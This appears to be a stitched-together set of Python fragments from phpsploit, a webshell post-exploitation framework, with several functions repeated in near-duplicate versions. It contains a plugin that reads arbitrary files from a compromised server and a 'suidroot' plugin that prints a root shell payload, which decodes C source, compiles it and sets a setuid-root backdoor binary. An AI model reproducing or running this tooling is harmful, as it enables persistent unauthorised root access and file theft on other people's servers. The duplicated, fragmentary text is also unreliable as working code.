def read(self, bin_mode=False):
"""Read path file contents.
This method actually returns a string formatted for
the current platform.
It means that a file contents which uses '\r\n' line
separators will be returned with '\n' separators
instead, if it is opened through a GNU/Linux system.
If you want to read data rawly, without newline treatment
as mentionned above, the bin_mode optionnal argument
should be set to True, in which case a bytes() buffer
containing file data is returned instead of str().
"""
if not bin_mode:
try:
lines = self.readlines()
data = os.linesep.join(lines)
return data
except UnicodeDecodeError:
bytestring = self.read(bin_mode=True)
return encoding.decode(bytestring)
elif bin_mode:
return open(self, 'rb').read()
def py2php(python_var):
"""Convert a python object into php serialized code string.
"""
serialized = phpserialize.dumps(python_var,
charset=encoding.default_encoding,
errors=encoding.default_errors)
serialized = encoding.decode(serialized)
encoded = Encode(serialized).php_loader()
raw_php_var = 'unserialize(%s)' % encoded
return raw_php_var
def py2php(python_var):
"""Convert a python object into php serialized code string.
"""
serialized = phpserialize.dumps(python_var,
charset=encoding.default_encoding,
errors=encoding.default_errors)
serialized = encoding.decode(serialized)
encoded = Encode(serialized).php_loader()
raw_php_var = 'unserialize(%s)' % encoded
return raw_php_var
def do_corectl(self, argv):
"""Advanced core debugging utils
SYNOPSIS:
corectl <TOOL>
CORECTL TOOLS:
--------------
stack-traceback
Print the full track trace of last python exception.
Error messages (lines that starts with a `[!]` red tag)
are generated by a thrown exception.
The `stack-traceback` tool displays the full python
stack trace of the last thrown exception.
This command is useful for debugging purposes.
NOTE: stack traceback is NOT saved in session files
reload-plugins
Reload all phpsploit plugins.
By default, the list of phpsploit plugins is loaded
once only, when the framework starts.
Therefore, plugin developpers may want to reload
the plugins in order to be able to test their
plugin modifications without having to restart the
framework each time.
python-console
Run a python interpreter.
The python console interpreter is a good gateway
for deep debugging, or to get help about a phpsploit
module, class, object, such as the plugin developpers
API.
For help with the API, run the following commands inside
of the python console:
>>> import api
>>> help(api)
display-http-requests
Display HTTP(s) request(s) for debugging
Shows all HTTP(s) request(s) that where sent in the last
remote command execution.
NOTE: http requests are NOT saved in session files
WARNING: don't works with HTTPS requests (see issue #29 on github)
"""
argv.append('')
if argv[1] == "stack-traceback":
try:
e = self.last_exception
e = traceback.format_exception(type(e), e, e.__traceback__)
# a small patch for traceback from plugins, remove trash lines
for index, line in enumerate(e):
if ('File "<frozen importlib._bootstrap>"' in line
and '_call_with_frames_removed' in line):
e = e[(index + 1):]
header = "Traceback (most recent call last):"
e.insert(0, header + os.linesep)
break
e = colorize("%Red", "".join(e))
except:
e = "[-] Exception stack is empty"
print(e)
elif argv[1] == "reload-plugins":
plugins.reload(verbose=True)
elif argv[1] == "python-console":
import ui.console
console = ui.console.Console()
console.banner = "Phpsploit corectl: python console interpreter"
console()
elif argv[1] == "display-http-requests":
requests = enumerate(tunnel.get_raw_requests(), 1)
if not requests:
print("[-] No HTTP(s) requests were sent up to now")
return
for num, request in requests:
print("#" * 78)
print("### REQUEST %d" % num)
print("#" * 78)
print(encoding.decode(request))
else:
self.interpret("help corectl")
> cat "C:\Users\granny\Desktop\bank account.TXT"
- Don't be evil with grannies!
- As gannies use spaces in file names, the path
must be quoted to be parsed as a single argument.
AUTHOR:
nil0x42 <http://goo.gl/kb2wf>
"""
import sys
import base64
from core import encoding
from api import plugin
from api import server
if len(plugin.argv) != 2:
sys.exit(plugin.help)
relative_path = plugin.argv[1]
absolute_path = server.path.abspath(relative_path)
payload = server.payload.Payload("payload.php")
payload['FILE'] = absolute_path
response = payload.send()
data = encoding.decode(base64.b64decode(response))
print(data)
sys.exit("Plugin available on unix-based platforms only")
if len(plugin.argv) < 2:
sys.exit(plugin.help)
if plugin.argv[1] == '--create':
if len(plugin.argv) != 3:
sys.exit(plugin.help)
payload_file = server.path.abspath(plugin.argv[2])
# create the payload that must be run as privileged used.
# The suidroot payload is then created with suid byte
# enabled, making tunnel available.
file = open(os.path.join(plugin.path, "payload.c"), 'rb')
source_code = encoding.decode(base64.b64encode(file.read()))
payload = ("echo %b | python -m base64 -d | gcc -o %f -x c -;"
"chown root %f;"
"chmod 4755 %f;"
).replace('%f', payload_file).replace('%b', source_code)
# prevent previous configuration override
if SUIDROOT_ENV_VARS.issubset(set(environ)):
msg = "suidroot environment variables already set. override them ?"
if ui.input.Expect(False, skip_interrupt=False)(msg):
sys.exit("Operation canceled")
print("[*] In order to use suidroot privileged command execution, "
"run the following shell payload AS ROOT on the remote system:")
print(ui.color.colorize("\n", "%Blue", payload, "\n"))
def do_corectl(self, argv):
"""Advanced core debugging utils
SYNOPSIS:
corectl <TOOL>
CORECTL TOOLS:
--------------
stack-traceback
Print the full track trace of last python exception.
Error messages (lines that starts with a `[!]` red tag)
are generated by a thrown exception.
The `stack-traceback` tool displays the full python
stack trace of the last thrown exception.
This command is useful for debugging purposes.
NOTE: stack traceback is NOT saved in session files
reload-plugins
Reload all phpsploit plugins.
By default, the list of phpsploit plugins is loaded
once only, when the framework starts.
Therefore, plugin developpers may want to reload
the plugins in order to be able to test their
plugin modifications without having to restart the
framework each time.
python-console
Run a python interpreter.
The python console interpreter is a good gateway
for deep debugging, or to get help about a phpsploit
module, class, object, such as the plugin developpers
API.
For help with the API, run the following commands inside
of the python console:
>>> import api
>>> help(api)
display-http-requests
Display HTTP(s) request(s) for debugging
Shows all HTTP(s) request(s) that where sent in the last
remote command execution.
NOTE: http requests are NOT saved in session files
WARNING: don't works with HTTPS requests (see issue #29 on github)
"""
argv.append('')
if argv[1] == "stack-traceback":
try:
e = self.last_exception
e = traceback.format_exception(type(e), e, e.__traceback__)
# a small patch for traceback from plugins, remove trash lines
for index, line in enumerate(e):
if ('File "<frozen importlib._bootstrap>"' in line
and '_call_with_frames_removed' in line):
e = e[(index + 1):]
header = "Traceback (most recent call last):"
e.insert(0, header + os.linesep)
break
e = colorize("%Red", "".join(e))
except:
e = "[-] Exception stack is empty"
print(e)
elif argv[1] == "reload-plugins":
plugins.reload(verbose=True)
elif argv[1] == "python-console":
import ui.console
console = ui.console.Console()
console.banner = "Phpsploit corectl: python console interpreter"
console()
elif argv[1] == "display-http-requests":
requests = enumerate(tunnel.get_raw_requests(), 1)
if not requests:
print("[-] No HTTP(s) requests were sent up to now")
return
for num, request in requests:
print("#" * 78)
print("### REQUEST %d" % num)
print("#" * 78)
print(encoding.decode(request))
else:
self.interpret("help corectl")
def do_corectl(self, argv):
"""Advanced core debugging utils
SYNOPSIS:
corectl <TOOL>
CORECTL TOOLS:
--------------
stack-traceback
Print the full track trace of last python exception.
Error messages (lines that starts with a `[!]` red tag)
are generated by a thrown exception.
The `stack-traceback` tool displays the full python
stack trace of the last thrown exception.
This command is useful for debugging purposes.
NOTE: stack traceback is NOT saved in session files
reload-plugins
Reload all phpsploit plugins.
By default, the list of phpsploit plugins is loaded
once only, when the framework starts.
Therefore, plugin developpers may want to reload
the plugins in order to be able to test their
plugin modifications without having to restart the
framework each time.
python-console
Run a python interpreter.
The python console interpreter is a good gateway for deep
debugging, or to get help about a phpsploit module, class,
object, such as the plugin developpers API.
For help with the API, run the following commands inside
the python console:
>>> import api
>>> help(api)
display-http-requests
Display HTTP(s) request(s) for debugging
Shows all HTTP(s) request(s) that where sent in the last
remote command execution.
NOTE: http requests are NOT saved in session files
WARNING: don't works with HTTPS requests (see issue #29 on github)
"""
argv.append('')
if argv[1] == "stack-traceback":
if not self.last_exception:
print("[-] Exception stack is empty")
return False
for line in self.last_exception:
print(colorize("%Red", line))
return True
if argv[1] == "reload-plugins":
return plugins.reload(verbose=True)
if argv[1] == "python-console":
from ui import console
console = console.Console()
console.banner = "Phpsploit corectl: python console interpreter"
return console()
if argv[1] == "display-http-requests":
requests = tunnel.get_raw_requests()
if not requests:
print("[-] From now, phpsploit didn't "
"sent any HTTP(s) request")
return False
print("[*] Listing last payload's HTTP(s) requests:\n")
for num, request in enumerate(requests, 1):
print("#" * 78)
print("### REQUEST %d" % num)
print("#" * 78)
print(encoding.decode(request))
return True
self.interpret("help corectl")
return False
def do_corectl(self, argv):
"""Advanced core debugging utils
SYNOPSIS:
corectl <TOOL>
CORECTL TOOLS:
--------------
stack-traceback
Print the full track trace of last python exception.
Error messages (lines that starts with a `[!]` red tag)
are generated by a thrown exception.
The `stack-traceback` tool displays the full python
stack trace of the last thrown exception.
This command is useful for debugging purposes.
NOTE: stack traceback is NOT saved in session files
reload-plugins
Reload all phpsploit plugins.
By default, the list of phpsploit plugins is loaded
once only, when the framework starts.
Therefore, plugin developpers may want to reload
the plugins in order to be able to test their
plugin modifications without having to restart the
framework each time.
python-console
Run a python interpreter.
The python console interpreter is a good gateway for deep
debugging, or to get help about a phpsploit module, class,
object, such as the plugin developpers API.
For help with the API, run the following commands inside
the python console:
>>> import api
>>> help(api)
display-http-requests
Display HTTP(s) request(s) for debugging
Shows all HTTP(s) request(s) that were sent in the last
remote command execution.
NOTE: http requests are NOT saved in session files
WARNING: don't works with HTTPS requests (see issue #29 on github)
"""
argv.append('')
if argv[1] == "stack-traceback":
if not self.last_exception:
print("[-] Exception stack is empty")
return False
for line in self.last_exception:
print(colorize("%Red", line))
return True
if argv[1] == "reload-plugins":
return plugins.reload(verbose=True)
if argv[1] == "python-console":
from ui import console
console = console.Console()
console.banner = "Phpsploit corectl: python console interpreter"
return console()
if argv[1] == "display-http-requests":
requests = tunnel.get_raw_requests()
if not requests:
print("[-] From now, phpsploit didn't "
"sent any HTTP(s) request")
return False
print("[*] Listing last payload's HTTP(s) requests:\n")
for num, request in enumerate(requests, 1):
print("#" * 78)
print("### REQUEST %d" % num)
print("#" * 78)
print(encoding.decode(request))
return True
self.interpret("help corectl")
return False
sys.exit("Plugin available on unix-based platforms only")
if len(plugin.argv) < 2:
sys.exit(plugin.help)
if plugin.argv[1] == '--create':
if len(plugin.argv) != 3:
sys.exit(plugin.help)
backdoor_file = server.path.abspath(plugin.argv[2])
# create the payload that must be run as privileged used.
# The suidroot backdoor is then created with suid byte
# enabled, making tunnel available.
file = open(os.path.join(plugin.path, "backdoor.c"), 'rb')
source_code = encoding.decode(base64.b64encode(file.read()))
payload = ("echo %b | python -m base64 -d | gcc -o %f -x c -;"
"chown root %f;"
"chmod 4755 %f;"
).replace('%f', backdoor_file).replace('%b', source_code)
# prevent previous configuration override
if SUIDROOT_ENV_VARS.issubset(set(environ)):
msg = "suidroot environment variables already set. override them ?"
if ui.input.Expect(False, skip_interrupt=False)(msg):
sys.exit("Operation canceled")
print("[*] In order to use suidroot privileged command execution, "
"run the following shell payload AS ROOT on the remote system:")
print(ui.color.colorize("\n", "%Blue", payload, "\n"))
- Don't be evil with grannies!
NOTE: since gannies use spaces in file names, the path
string must be enquoted to be considered as a single
argument.
AUTHOR:
nil0x42 <http://goo.gl/kb2wf>
"""
import sys
import base64
from core import encoding
from api import plugin
from api import server
if len(plugin.argv) != 2:
sys.exit(plugin.help)
relative_path = plugin.argv[1]
absolute_path = server.path.abspath(relative_path)
payload = server.payload.Payload("payload.php")
payload['FILE'] = absolute_path
response = payload.send()
data = encoding.decode(base64.b64decode(response))
print(data)
